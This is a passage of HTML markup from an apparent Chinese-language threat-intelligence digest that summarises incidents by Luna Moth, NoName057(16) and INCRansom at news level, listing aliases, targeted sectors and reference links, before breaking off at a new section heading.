[&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8majiw20v4" style="font-size: 32px;" data-mpa-action-id="md8majjwecx" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Luna - Moth团伙网络入侵加密数据发起勒索攻击</span></span></p></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8j9i4022ao"><span leaf="">家族团伙别名：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf="">TG2729, Silent Ransom Group</span></span></p></li><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">家族团伙主要影响行业：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">医疗, 金融</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="color: rgb(0, 82, 255);font-weight: bold;font-size: 14px;text-align: left;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://www.hendryadrian.com/ransom-mintzer-sarowitz-zeris-ledva-meyers/" target="_blank">https://www.hendryadrian.com/ransom-mintzer-sarowitz-zeris-ledva-meyers/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;"><span leaf="" mpa-font-style="mdig1jnt1o4d" style="font-size: 14px;" data-mpa-action-id="mdig1jo4rhy" data-pm-slice="0 0 []">Luna - Moth团伙 对一民事辩护法律服务机构发起勒索软件攻击，该机构设有多个办公地点。攻击者疑似通过网络钓鱼、弱口令或已知漏洞快速突破防线，对多地办公室网络集中实施入侵并加密内部数据，展现出较高的技术能力和组织协调性。此次攻击带有明显勒索特征，通过破坏数据访问权限干扰机构正常业务运营，使其面临业务中断、潜在财务损失等风险。事件揭示了相关机构网络防御体系在应对高强度定向攻击时的不足，也提示漏洞管理强化与员工安全意识提升，是防范此类攻击的关键。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">NoName057利用拒绝服务攻击扰乱目标系统并篡改设置对网站实施破坏</span></span></p></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">NoName05716, NoName057(16), 05716nnm, Nnm05716</span></span></p></li><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">政法, 电信运营商</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://cyberscoop.com/us-charges-russian-backed-hacker-critical-infrastructure-attacks-carr-noname05716/" target="_blank">https://cyberscoop.com/us-charges-russian-backed-hacker-critical-infrastructure-attacks-carr-noname05716/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;margin-bottom: 16px;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">近期，一起网络攻击案件始于分布式拒绝服务攻击，后升级为针对工业控制系统的破坏性入侵。攻击者先通过大规模分布式拒绝服务攻击扰乱目标系统，再以侵入手段精细化入侵工业控制系统并篡改设置，导致部分供水系统失控、大量水资源外泄，某加工厂发生物资变质及泄漏事故，人员被迫紧急疏散。攻击还波及多个相关领域基础设施，展现出多领域组合使用技术手段进行破坏的战略布局。此次攻击造成了实质性破坏，引发环境安全隐患、经济损失和公众健康风险，同时对相关领域形成潜在威胁。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">INCRansom通过勒索软件发起攻击非法访问并窃取200GB敏感数据</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:bold;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">G1032, INCRRansom group</span></span></p></li><li style="font-size:14px;font-weight:bold;"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">政法, 交通, 建筑与不动产, 教育, 医疗</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/ransom-rainbowtel-net/" target="_blank">https://www.hendryadrian.com/ransom-rainbowtel-net/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">根据公开的勒索声明，INCRansom 组织对一知名企业发起勒索软件攻击，攻击者先通过网络漏洞获取系统访问权限，再在内部横向移动，窃取约 200GB 敏感数据，包括会计记录、人力资源数据及客户信息。该组织通过公开的特定链接发布攻击声明，披露侵入与数据窃取相关信息。此次攻击显示攻击者对目标企业网络结构进行了详细侦查，精心策划了入侵、提权和数据窃取步骤，暴露了企业网络防护的严重漏洞，也引发了业界对相关基础设施安全性的广泛关注。攻击造成严重数据泄露风险，对企业业务运营和客户信任构成重大威胁，还可能引发法律责任及后续经济损失。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">02</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in6w7nn3" style="font-size: 20px;" data-mpa-action-id="md8in6x11o66" data-pm-slice="0 0 []">热点攻击手段</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 